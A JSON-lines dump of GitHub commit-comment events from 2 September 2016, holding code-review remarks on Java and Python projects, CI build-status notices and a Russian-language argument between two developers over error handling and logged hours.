{"id":"4508109825","type":"CommitCommentEvent","actor":{"login":"kissarat"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879088,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T11:58:40Z","updated_at":"2016-09-02T11:58:40Z","body":"Да, я изменил логику. 400 возвращаеться когда запрос неправильний, а не когда у тебя есть какие то лишние параметры. Никто не запрещает пользователю передавить лишние (неизвестные) параметры. У тебя квадратно-гнездовой способ мышления"}},"created_at":"2016-09-02T11:58:40Z"}
{"id":"4508109925","type":"CommitCommentEvent","actor":{"login":"Yusufras"},"repo":{"name":"citation-style-language/styles"},"payload":{"comment":{"id":18879089,"position":null,"line":null,"path":null,"commit_id":"d7fa26479d6600707922e3e1bfb0f92647d6050c","created_at":"2016-09-02T11:58:41Z","updated_at":"2016-09-02T11:58:41Z","body":"Were the changes made correct?"}},"created_at":"2016-09-02T11:58:41Z"}
{"id":"4508113431","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18879095,"position":109,"line":171,"path":"tests/org.eclipse.emf.eson.tests/src/org/eclipse/emf/eson/serialization/tests/Serialization2Test.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T11:59:36Z","updated_at":"2016-09-02T11:59:36Z","body":"System.out is not recommended, use an assetNotNull instead, or compare it with file loaded earlier"}},"created_at":"2016-09-02T11:59:36Z"}
{"id":"4508115956","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879100,"position":null,"line":null,"path":null,"commit_id":"7f3eced6e67f4e18960bfb94a977de7b814f9b55","created_at":"2016-09-02T12:00:16Z","updated_at":"2016-09-02T12:00:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 48](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12368&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-02T12:00:16Z"}
{"id":"4508117587","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879104,"position":17,"line":17,"path":"src/ControlerPack/Controller.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T12:00:37Z","updated_at":"2016-09-02T12:00:37Z","body":"Your methods in controller doesn't need \"String username\" parameter. Because you should keep logedInUser as a static member in your controller."}},"created_at":"2016-09-02T12:00:37Z"}
{"id":"4508119666","type":"CommitCommentEvent","actor":{"login":"xX-Yoshi-Xx"},"repo":{"name":"Arc-Team/android_kernel_lge_d851"},"payload":{"comment":{"id":18879115,"position":null,"line":null,"path":null,"commit_id":"a87a3702db31abd913945204c31eef16ffb992fa","created_at":"2016-09-02T12:01:08Z","updated_at":"2016-09-02T12:01:08Z","body":"Does this fix the g3 camera on 7.0?"}},"created_at":"2016-09-02T12:01:08Z"}
{"id":"4508121286","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879120,"position":9,"line":9,"path":"src/ControlerPack/Controller.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T12:01:32Z","updated_at":"2016-09-02T12:01:32Z","body":"Your controller shouldn't create db folder"}},"created_at":"2016-09-02T12:01:32Z"}
{"id":"4508122022","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18879125,"position":28,"line":43,"path":"ficbot.js","commit_id":"4497ff909c700fcc506ef15e2ce7540e603aadfc","created_at":"2016-09-02T12:01:44Z","updated_at":"2016-09-02T12:01:44Z","body":"Seems like \"associative array\" is the best term to use in JavaScript"}},"created_at":"2016-09-02T12:01:44Z"}
{"id":"4508122600","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879128,"position":null,"line":null,"path":null,"commit_id":"7f3eced6e67f4e18960bfb94a977de7b814f9b55","created_at":"2016-09-02T12:01:52Z","updated_at":"2016-09-02T12:01:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 48](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12368&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:36"}},"created_at":"2016-09-02T12:01:52Z"}
{"id":"4508123903","type":"CommitCommentEvent","actor":{"login":"martinpesout"},"repo":{"name":"whoisandie/react-rangeslider"},"payload":{"comment":{"id":18879131,"position":null,"line":null,"path":null,"commit_id":"44da62ce03042de6a1e45082a4b3c0b53cbb1f8f","created_at":"2016-09-02T12:02:13Z","updated_at":"2016-09-02T12:02:13Z","body":"@whoisandie is it possible to include this into version of this library with tag 1.0.4?"}},"created_at":"2016-09-02T12:02:13Z"}
{"id":"4508124814","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixos-weekly"},"payload":{"comment":{"id":18879136,"position":null,"line":null,"path":null,"commit_id":"f565d0e82e09f7376b13fce9954b4903cb794e62","created_at":"2016-09-02T12:02:25Z","updated_at":"2016-09-02T12:02:25Z","body":"Is it intended, that the NixOS logo is not centered in most in most of the icons? Looks weird."}},"created_at":"2016-09-02T12:02:25Z"}
{"id":"4508125010","type":"CommitCommentEvent","actor":{"login":"rim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18879137,"position":null,"line":null,"path":null,"commit_id":"dc18056fd01848c51a8dfe83f22bcc268aaefea4","created_at":"2016-09-02T12:02:28Z","updated_at":"2016-09-02T12:02:28Z","body":":+1: :dancer: "}},"created_at":"2016-09-02T12:02:28Z"}
{"id":"4508127219","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879145,"position":15,"line":140,"path":"api/views.py","commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:02:59Z","updated_at":"2016-09-02T12:02:59Z","body":"Тут удалил, а тут добавил a09501fbfaf4d08a541822dac9c7bc2365e50c35 - квадратно-гнездовое мышление"}},"created_at":"2016-09-02T12:02:59Z"}
{"id":"4508128217","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18879152,"position":null,"line":null,"path":null,"commit_id":"ce64d8de058a7fbc0058cd48d05aa37b97177d40","created_at":"2016-09-02T12:03:15Z","updated_at":"2016-09-02T12:03:15Z","body":"If this is just fixing something that's broken in `master` (as it looks like it is), that should really be put through as a separate Issue + PR combo, disconnected (and not getting held up by) this one."}},"created_at":"2016-09-02T12:03:15Z"}
{"id":"4508129674","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18879156,"position":83,"line":80,"path":"ficbot.js","commit_id":"4497ff909c700fcc506ef15e2ce7540e603aadfc","created_at":"2016-09-02T12:03:37Z","updated_at":"2016-09-02T12:03:37Z","body":"Notice the replacements, specifically those for braces and backslashes, are performed before the `\\end{document}` command and front matter are joined with the text block."}},"created_at":"2016-09-02T12:03:37Z"}
{"id":"4508132394","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879164,"position":null,"line":null,"path":null,"commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T12:04:19Z","updated_at":"2016-09-02T12:04:19Z","body":"I can't find repository layer. "}},"created_at":"2016-09-02T12:04:19Z"}
{"id":"4508134653","type":"CommitCommentEvent","actor":{"login":"dmi3yy"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18879169,"position":null,"line":null,"path":null,"commit_id":"7bf955c8d2628a30f8dbc58625450ff4ca8702c1","created_at":"2016-09-02T12:04:54Z","updated_at":"2016-09-02T12:04:54Z","body":"incorrect work on php 7 \r\n\r\nhttps://monosnap.com/file/pZvXXZP0CKxS7pj4sFc7dOQjNOFQeh\r\n"}},"created_at":"2016-09-02T12:04:54Z"}
{"id":"4508138484","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18879179,"position":null,"line":null,"path":null,"commit_id":"7b63cb31894bbd0d5192b892691db51e536c796d","created_at":"2016-09-02T12:05:52Z","updated_at":"2016-09-02T12:05:52Z","body":"This adds an extra 10MB to this repo, and I'm worried that unless we're careful we're going to end up with an entire copy of `everypolitician-data` as our test fixtures. Is this actually needed here? If you just want a country with more than one house, we already have Australia @ f8dcbd9."}},"created_at":"2016-09-02T12:05:52Z"}
{"id":"4508139249","type":"CommitCommentEvent","actor":{"login":"NejcZdovc"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":18879181,"position":32,"line":26,"path":"src/store/storage/local.ts","commit_id":"028091d444e36faf46ec75c7415552da0a203691","created_at":"2016-09-02T12:06:04Z","updated_at":"2016-09-02T12:06:04Z","body":"Ok now I understand and it was fixed.  Changed `_toJsObject` to `toJsObject`."}},"created_at":"2016-09-02T12:06:04Z"}
{"id":"4508140225","type":"CommitCommentEvent","actor":{"login":"lcsoul"},"repo":{"name":"lcsoul/shadowsocks-rss"},"payload":{"comment":{"id":18879185,"position":null,"line":null,"path":null,"commit_id":"d96aaf0eed9631d67739c2e93c77e94c789c1a21","created_at":"2016-09-02T12:06:19Z","updated_at":"2016-09-02T12:06:19Z","body":"破娃酱最终版"}},"created_at":"2016-09-02T12:06:19Z"}
{"id":"4508140582","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879188,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:06:26Z","updated_at":"2016-09-02T12:06:26Z","body":"Наверное, все таки надо приложить сюда, сколько времени ты обсасывал этот тикет в багзилле"}},"created_at":"2016-09-02T12:06:26Z"}
{"id":"4508142216","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879197,"position":21,"line":21,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:06:50Z","updated_at":"2016-09-02T12:06:50Z","body":"You shouldn't keep your file path hard codded. \r\nYou should keep properties file and read this path from there. "}},"created_at":"2016-09-02T12:06:50Z"}
{"id":"4508142566","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879198,"position":null,"line":null,"path":null,"commit_id":"bb788310833531244a7c696fff728efdc086b01c","created_at":"2016-09-02T12:06:56Z","updated_at":"2016-09-02T12:06:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 904](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12370&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T12:06:56Z"}
{"id":"4508143140","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18879202,"position":null,"line":null,"path":null,"commit_id":"199a71cb12970e22e6574e7990d1f1ac656febe5","created_at":"2016-09-02T12:07:06Z","updated_at":"2016-09-02T12:07:06Z","body":"Something seems to have gone awry with the quote in the commit message here vs https://github.com/everypolitician/viewer-sinatra/pull/13598/commits/3c68cdf1227190e076c70f3a1b076bdbffc1f4e5"}},"created_at":"2016-09-02T12:07:06Z"}
{"id":"4508143896","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18879204,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T12:07:17Z","updated_at":"2016-09-02T12:07:17Z","body":"I've played around some more now with different constellation of installed and un-installed **qt5ct** and **qt5-styleplugins** packages and with different env vars set, and I could not find any situation when either ``QT_STYLE_OVERRIDE=gtk`` or ``gtk2`` would be useful. So, not setting it at all would have been my suggestion.\r\nBut as long as `QT_STYLE_OVERRIDE`` is out of the way while ``QT_QPA_PLATFORMTHEME=qt5ct`` I'm happy with it and it works."}},"created_at":"2016-09-02T12:07:17Z"}
{"id":"4508144300","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879206,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:07:24Z","updated_at":"2016-09-02T12:07:24Z","body":"<img width=\"1440\" alt=\"screen shot 2016-09-02 at 3 06 47 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203313/f16f1922-711e-11e6-9017-0937d0c51396.png\">\r\n<img width=\"1440\" alt=\"screen shot 2016-09-02 at 3 06 50 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203314/f1946dd0-711e-11e6-83e7-b596f8e38804.png\">\r\n<img width=\"1440\" alt=\"screen shot 2016-09-02 at 3 06 54 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203315/f1948504-711e-11e6-8d72-33bc7a26859b.png\">\r\n"}},"created_at":"2016-09-02T12:07:24Z"}
{"id":"4508145496","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879213,"position":27,"line":27,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:07:44Z","updated_at":"2016-09-02T12:07:44Z","body":"getMessage should be in other class e.g. MessageUtil"}},"created_at":"2016-09-02T12:07:44Z"}
{"id":"4508148559","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879215,"position":73,"line":73,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:08:32Z","updated_at":"2016-09-02T12:08:32Z","body":"Your application shouldn't stop after sign out"}},"created_at":"2016-09-02T12:08:32Z"}
{"id":"4508149656","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879225,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:08:48Z","updated_at":"2016-09-02T12:08:48Z","body":"Есть задачи, за которые ты просто отчитался, и мы не знаем, что там было сделано\r\n\r\n<img width=\"1440\" alt=\"screen shot 2016-09-02 at 3 08 06 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203339/24933fe0-711f-11e6-897d-b103cce462cb.png\">\r\n"}},"created_at":"2016-09-02T12:08:48Z"}
{"id":"4508150182","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879236,"position":18,"line":18,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:08:56Z","updated_at":"2016-09-02T12:08:56Z","body":"thisUser -> logedInUser"}},"created_at":"2016-09-02T12:08:56Z"}
{"id":"4508151450","type":"CommitCommentEvent","actor":{"login":"kissarat"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879248,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:09:16Z","updated_at":"2016-09-02T12:09:16Z","body":"Да ты просто параноик, ты помнишь такие детали. При этом даже нет документа с отчестностью."}},"created_at":"2016-09-02T12:09:16Z"}
{"id":"4508152138","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879251,"position":19,"line":19,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:09:27Z","updated_at":"2016-09-02T12:09:27Z","body":"You shouldn't keep all users in your application memory. You should every time read from db."}},"created_at":"2016-09-02T12:09:27Z"}
{"id":"4508153959","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879255,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:09:56Z","updated_at":"2016-09-02T12:09:56Z","body":"есть документ, он генерится в багзилле, там все отчеты есть по часам"}},"created_at":"2016-09-02T12:09:56Z"}
{"id":"4508156068","type":"CommitCommentEvent","actor":{"login":"tomayac"},"repo":{"name":"tomayac/apps-scripts-adwords-scripts-jshintrc-jscsrc"},"payload":{"comment":{"id":18879259,"position":null,"line":null,"path":null,"commit_id":"c4735618e92a3cdf58d3a7a8b7d926bec72aefe3","created_at":"2016-09-02T12:10:29Z","updated_at":"2016-09-02T12:10:29Z","body":"Opened https://github.com/jscs-dev/node-jscs/pull/2292 in the hope that it still gets merged."}},"created_at":"2016-09-02T12:10:29Z"}
{"id":"4508156319","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"GMNetwork/TF-Auth"},"payload":{"comment":{"id":18879260,"position":3,"line":0,"path":"resources/config.yml","commit_id":"825d28b9c38cf6e4c6627d2ec934adbaea5eab3d","created_at":"2016-09-02T12:10:32Z","updated_at":"2016-09-02T12:10:32Z","body":"Is not authenticated lol"}},"created_at":"2016-09-02T12:10:32Z"}
{"id":"4508156853","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879261,"position":83,"line":83,"path":"src/CaontrollerLayer/Controller.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:10:40Z","updated_at":"2016-09-02T12:10:40Z","body":"You should do repo layer method call for write user to your database(file)"}},"created_at":"2016-09-02T12:10:40Z"}
{"id":"4508165150","type":"CommitCommentEvent","actor":{"login":"kissarat"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879290,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:12:49Z","updated_at":"2016-09-02T12:12:49Z","body":"Забыл за багзиллу. Короче говоря, да, наверно я делал долго, уже и не помню. А еще я не был согласен с реализацией, но ты усомнится в своей правоте тоже не мог"}},"created_at":"2016-09-02T12:12:49Z"}
{"id":"4508166093","type":"CommitCommentEvent","actor":{"login":"mpellicer"},"repo":{"name":"sakaiproject/sakai"},"payload":{"comment":{"id":18879297,"position":null,"line":null,"path":null,"commit_id":"0155c1ffe178a82f18186777254c3ece5ec7e810","created_at":"2016-09-02T12:13:03Z","updated_at":"2016-09-02T12:13:03Z","body":"@ottenhoff Sure, check this PR:\r\n\r\nhttps://github.com/sakaiproject/sakai/pull/3293"}},"created_at":"2016-09-02T12:13:03Z"}
{"id":"4508166120","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879299,"position":1,"line":1,"path":"src/DataLayer/PhoneNumber.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:13:04Z","updated_at":"2016-09-02T12:13:04Z","body":"package names shouldn't contain uppercase.\r\nand your PhoneNumber is a bean so you can set your package name e.g. \r\npackage am.aca.addressbook.bean;"}},"created_at":"2016-09-02T12:13:04Z"}
{"id":"4508168315","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879305,"position":4,"line":4,"path":"src/DataLayer/PhoneNumber.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:13:40Z","updated_at":"2016-09-02T12:13:40Z","body":"also your PhoneNumber bean should has id\r\nprivate int id;"}},"created_at":"2016-09-02T12:13:40Z"}
{"id":"4508169998","type":"CommitCommentEvent","actor":{"login":"jeroennoten"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":18879308,"position":12,"line":29,"path":"resources/assets/js/bootstrap.js","commit_id":"9c0278274bcaa7370a9810c4e7d6f791c1d6146d","created_at":"2016-09-02T12:14:04Z","updated_at":"2016-09-02T12:14:04Z","body":"It's in the `app.blade.php` after running `auth:make`. In my opinion it is not 'right' to let this depend on authentication scaffolding, while this is in the code base by default, even in the compiled `app.js`. @taylorotwell "}},"created_at":"2016-09-02T12:14:04Z"}
{"id":"4508170811","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879311,"position":11,"line":11,"path":"src/DataLayer/User.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:14:18Z","updated_at":"2016-09-02T12:14:18Z","body":"also should has \r\nSet<User> friends = new HashSet();"}},"created_at":"2016-09-02T12:14:18Z"}
{"id":"4508171468","type":"CommitCommentEvent","actor":{"login":"ittala"},"repo":{"name":"msweier/QGIS-Drainage-Channel-Builder"},"payload":{"comment":{"id":18879314,"position":null,"line":null,"path":null,"commit_id":"b9fb3109fd9e4ef0b1723a19e0a37b0e383a56b7","created_at":"2016-09-02T12:14:28Z","updated_at":"2016-09-02T12:14:28Z","body":"Hi @msweier - just to let you know - the workaround worked ! First I used the raster calculator generate the cutline and then I used Raster / Miscellaneous / Build Virtual Raster  to combine the old DEM with the  cutline - and the result was that channel I need to run the optimization. So great stuff! **Many thanks** for your support. Still looking forward for a working channel builder version, which would spare some turns, but at least I can now continue with the project.  One if it will be to calculate the 2D volume.  "}},"created_at":"2016-09-02T12:14:28Z"}
{"id":"4508174816","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18879320,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T12:15:18Z","updated_at":"2016-09-02T12:15:18Z","body":"**v1.2** does that: It simply never exports ``QT_STYLE_OVERRIDE``.\r\nIf you prefer to export it ``=gtk`` while ``QT_QPA_PLATFORM == NULL``, lets use **v1.4**, otherwise we can just stay with my **v1.2** of yesterday..."}},"created_at":"2016-09-02T12:15:18Z"}
{"id":"4508175138","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879321,"position":10,"line":10,"path":"src/DataLayer/User.java","commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:15:22Z","updated_at":"2016-09-02T12:15:22Z","body":"public List<PhoneNumber> phoneNumberList = new ArrayList<>(); \r\nshould be\r\nprivate Set<PhoneNumber> phoneNumberList = new HashSet<>();\r\nI'm using Set because of Set doesn't allow keep duplicate elements."}},"created_at":"2016-09-02T12:15:22Z"}
{"id":"4508175505","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18879323,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-02T12:15:26Z","updated_at":"2016-09-02T12:15:26Z","body":"are you sure about energy_beam.lua?"}},"created_at":"2016-09-02T12:15:26Z"}
{"id":"4508177804","type":"CommitCommentEvent","actor":{"login":"lioncash"},"repo":{"name":"MerryMage/dynarmic"},"payload":{"comment":{"id":18879329,"position":null,"line":null,"path":null,"commit_id":"519c714dbc4862d923460738c2a785fe876a9cb8","created_at":"2016-09-02T12:15:58Z","updated_at":"2016-09-02T12:15:58Z","body":"Does it still warn about that if `<functional>` is included?"}},"created_at":"2016-09-02T12:15:58Z"}
{"id":"4508177916","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18879330,"position":null,"line":null,"path":null,"commit_id":"cf582d6a0b88a0a578315227f9e2c77541cfe672","created_at":"2016-09-02T12:16:00Z","updated_at":"2016-09-02T12:16:00Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=935)"}},"created_at":"2016-09-02T12:16:00Z"}
{"id":"4508178777","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879332,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:16:14Z","updated_at":"2016-09-02T12:16:14Z","body":"Этот коммит занял 4 часа \r\n<img width=\"836\" alt=\"screen shot 2016-09-02 at 3 15 42 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203524/2dcf594e-7120-11e6-8ab0-736046478412.png\">\r\n"}},"created_at":"2016-09-02T12:16:14Z"}
{"id":"4508179929","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/NewAddressBook"},"payload":{"comment":{"id":18879334,"position":null,"line":null,"path":null,"commit_id":"ca0a423eb8beec7242d42dc4d0be4dcca5c06abf","created_at":"2016-09-02T12:16:31Z","updated_at":"2016-09-02T12:16:31Z","body":"You should also has repository layer which is read and write your data from database(from file)"}},"created_at":"2016-09-02T12:16:31Z"}
{"id":"4508181697","type":"CommitCommentEvent","actor":{"login":"littleseven007"},"repo":{"name":"littleseven007/webpack-vue-mui"},"payload":{"comment":{"id":18879343,"position":null,"line":null,"path":null,"commit_id":"fe1dc9a182f7259c59b798d8b5442e236b35ed1a","created_at":"2016-09-02T12:16:59Z","updated_at":"2016-09-02T12:16:59Z","body":"配置修改"}},"created_at":"2016-09-02T12:16:59Z"}
{"id":"4508184031","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18879345,"position":null,"line":null,"path":null,"commit_id":"5c8eeb8ca2a9636c8d62abdefe5b6fc35fdd5df8","created_at":"2016-09-02T12:17:35Z","updated_at":"2016-09-02T12:17:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2016-09-02T12:17:35Z"}
{"id":"4508185195","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879346,"position":null,"line":null,"path":null,"commit_id":"bb788310833531244a7c696fff728efdc086b01c","created_at":"2016-09-02T12:17:53Z","updated_at":"2016-09-02T12:17:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 904](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12370&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:10:57"}},"created_at":"2016-09-02T12:17:53Z"}
{"id":"4508185700","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18879347,"position":null,"line":null,"path":null,"commit_id":"4cbb6dad54f51c31c6b8a4d208e5e5ee9bcf32c5","created_at":"2016-09-02T12:18:01Z","updated_at":"2016-09-02T12:18:01Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32182/testReport/) for this commit**"}},"created_at":"2016-09-02T12:18:01Z"}
{"id":"4508189709","type":"CommitCommentEvent","actor":{"login":"msweier"},"repo":{"name":"msweier/QGIS-Drainage-Channel-Builder"},"payload":{"comment":{"id":18879351,"position":null,"line":null,"path":null,"commit_id":"b9fb3109fd9e4ef0b1723a19e0a37b0e383a56b7","created_at":"2016-09-02T12:19:05Z","updated_at":"2016-09-02T12:19:05Z","body":"Glad it worked!  I will try and take a look at why it wasn't working for you.  I just tested on my computer and it was working...I think with newer version of matplotlib and GDAL somethings maybe broken."}},"created_at":"2016-09-02T12:19:05Z"}
{"id":"4508190117","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879354,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:19:11Z","updated_at":"2016-09-02T12:19:11Z","body":"Два часа на документрования метода Delete meeting - не кажется ли тебе, что это слишком? \r\n<img width=\"694\" alt=\"screen shot 2016-09-02 at 3 18 13 pm\" src=\"https://cloud.githubusercontent.com/assets/780938/18203600/978e720c-7120-11e6-9e87-33dcddb6f9e9.png\">\r\n"}},"created_at":"2016-09-02T12:19:11Z"}
